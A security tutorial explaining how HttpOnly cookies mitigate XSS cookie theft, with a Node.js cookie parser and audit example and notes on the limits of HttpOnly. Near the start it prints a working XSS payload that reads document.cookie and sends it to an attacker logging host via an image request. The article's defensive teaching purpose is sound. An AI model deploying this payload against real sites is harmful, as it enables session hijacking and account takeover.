Using HttpOnly cookies to mitigate cookie theft through XSS

Web services are built on HTTP, and HTTP is stateless: to carry state from one request to the next, the server has to mark the visitor somehow, which in practice means a session cookie. Whoever holds that cookie is, as far as the server can tell, that user, and can take over the account or act on the site in their name.

Once a site has an XSS vulnerability, an attacker can run arbitrary JavaScript in the victim's browser, and stealing cookies is then trivial: cookies are exposed through the browser's Document object, so a script only has to read document.cookie to obtain the victim's identity. A minimal cookie-stealing payload looks like this:

url = document.location.href; cookie = document.cookie;          // the victim's page and every cookie the browser exposes to script
c = new Image(); c.src = "http://www.xss-log-server.com/c.php?c=" + cookie + "&u=" + url;  // an image request carries both to the attacker's log server

Some sites recognise this problem and bind the session to the browser, for example by tying the cookie to the User-Agent header and treating any change as a sign of a stolen cookie. This has a serious drawback: an attacker who can steal the cookie through XSS can read the User-Agent (navigator.userAgent) just as easily and replay it, so the binding buys very little. A stricter variant binds the cookie to REMOTE_ADDR (in effect, the client IP), but this tends to hurt the user experience, for example for home ADSL users who do not keep one fixed IP address, or for many users sharing a single address behind a NAT.

So how do we protect sensitive cookies? From the analysis above, the usual theft path is reading cookies through the Document object, so what we need is for sensitive cookies to be invisible there. Microsoft Internet Explorer 6 Service Pack 1 and later support an HttpOnly cookie attribute that helps mitigate cross-site scripting: when a browser that understands the attribute receives an HttpOnly cookie, client-side script cannot read it.

HttpOnly is set like any other cookie attribute (Domain, Path, and so on). Once it is set, the cookie no longer appears in document.cookie, but normal browsing is unaffected, because the browser still sends the cookie in the Cookie request header on every matching request, including Ajax requests. Applications generally have no reason to touch sensitive cookies from JavaScript anyway, so the rule is: mark the sensitive cookies (session identifiers, authentication tokens) HttpOnly, and leave the attribute off only for the cookies the site's own JavaScript genuinely needs to read. That protects the cookies that matter while keeping the site's basic functionality intact.

The following shows how HttpOnly is set (note that the HttpOnly attribute name is case-insensitive):

Set-Cookie: <name>=<value>[; expires=<date>][; domain=<domain_name>][; path=<some_path>][; secure][; HttpOnly]
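To make the behaviour above concrete, here is an added example (not code from the original article) in plain Node.js. It models three things: a small parser for Set-Cookie header values whose attribute names are matched case-insensitively, as noted above; what a document.cookie read by an injected script would return, namely only the cookies that lack HttpOnly; and an audit that flags sensitive cookies set without HttpOnly or Secure. The cookie names (SESSIONID, theme) and header strings are constructed for the example and do not come from any real site.

```javascript
// Added example, not part of the original article. Models how the HttpOnly
// attribute changes what an XSS payload can read, and audits Set-Cookie headers.
// All header strings are constructed sample data, not captured traffic.

// Parse one Set-Cookie header value into name, value and recognised attributes.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const [nameValue, ...attrs] = parts;
  const eq = nameValue.indexOf('=');
  const cookie = {
    name: nameValue.slice(0, eq).trim(),
    value: nameValue.slice(eq + 1).trim(),
    httpOnly: false,
    secure: false,
    domain: null,
    path: null,
    expires: null,
  };
  for (const attr of attrs) {
    const i = attr.indexOf('=');
    // Attribute names are case-insensitive: HttpOnly, httponly and HTTPONLY all count.
    const key = (i === -1 ? attr : attr.slice(0, i)).trim().toLowerCase();
    const val = i === -1 ? null : attr.slice(i + 1).trim();
    switch (key) {
      case 'httponly': cookie.httpOnly = true; break;
      case 'secure':   cookie.secure = true; break;
      case 'domain':   cookie.domain = val; break;
      case 'path':     cookie.path = val; break;
      case 'expires':  cookie.expires = val; break;
      default: break; // unknown attributes are ignored, as browsers do
    }
  }
  return cookie;
}

// What the payload's document.cookie read would return: the browser omits every
// cookie carrying HttpOnly, so only the remaining name=value pairs are exposed.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Audit a response's Set-Cookie headers: sensitive cookies (session ids, auth
// tokens) must carry HttpOnly and, on a site served over TLS, Secure as well.
function auditCookies(setCookieHeaders, sensitiveNames) {
  const findings = [];
  for (const c of setCookieHeaders.map(parseSetCookie)) {
    if (!sensitiveNames.includes(c.name)) continue;
    if (!c.httpOnly) findings.push(`${c.name}: missing HttpOnly (readable via document.cookie)`);
    if (!c.secure) findings.push(`${c.name}: missing Secure (sent over plain HTTP)`);
  }
  return findings;
}

// Constructed sample headers. SESSIONID stands in for the sensitive cookie;
// "theme" is a preference the site's own JavaScript legitimately reads.
const WEAK_HEADERS = ['SESSIONID=abc123; Path=/', 'theme=dark; Path=/'];
const HARDENED_HEADERS = ['SESSIONID=abc123; Path=/; Secure; HttpOnly', 'theme=dark; Path=/'];

// With the weak headers the XSS payload exfiltrates the session id;
// with the hardened headers it sees only the theme cookie.
console.log('weak     ->', JSON.stringify(scriptVisibleCookies(WEAK_HEADERS)));
console.log('hardened ->', JSON.stringify(scriptVisibleCookies(HARDENED_HEADERS)));
console.log('audit (weak):', auditCookies(WEAK_HEADERS, ['SESSIONID']));
console.log('audit (hardened):', auditCookies(HARDENED_HEADERS, ['SESSIONID']));
```

The audit function is the part worth reusing: point it at the Set-Cookie headers a staging server actually emits and the list of cookie names that carry authentication state, and any cookie missing HttpOnly shows up before it reaches production. It checks only the attributes the article discusses; the parser ignores anything else.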

In ASP.NET the attribute is set through the HttpCookie.HttpOnly property: http://msdn.microsoft.com/en-cn/library/system.web.httpcookie.httponly.aspx

Today all mainstream browsers support the HttpOnly attribute; the list of supporting browsers can be checked at: https://www.owasp.org/index.php/httponly

Finally, HttpOnly is not a cure-all. It does not fix the XSS vulnerability itself, and it cannot stop a patient attacker: the injected script still runs inside the victim's page, so it can issue Ajax requests to the site, and the browser attaches the HttpOnly cookie to those requests automatically, letting the attacker act as the user without ever seeing the cookie value. Older browsers also leaked HttpOnly cookies through XMLHttpRequest response headers or through the HTTP TRACE method (cross-site tracing). HttpOnly therefore reduces the damage of cross-site scripting but has to be combined with other measures, above all output encoding and input validation; used alone it does not defeat XSS. If your site is built on ASP.NET, for example, the Microsoft Web Protection Library (formerly AntiXSS) is recommended.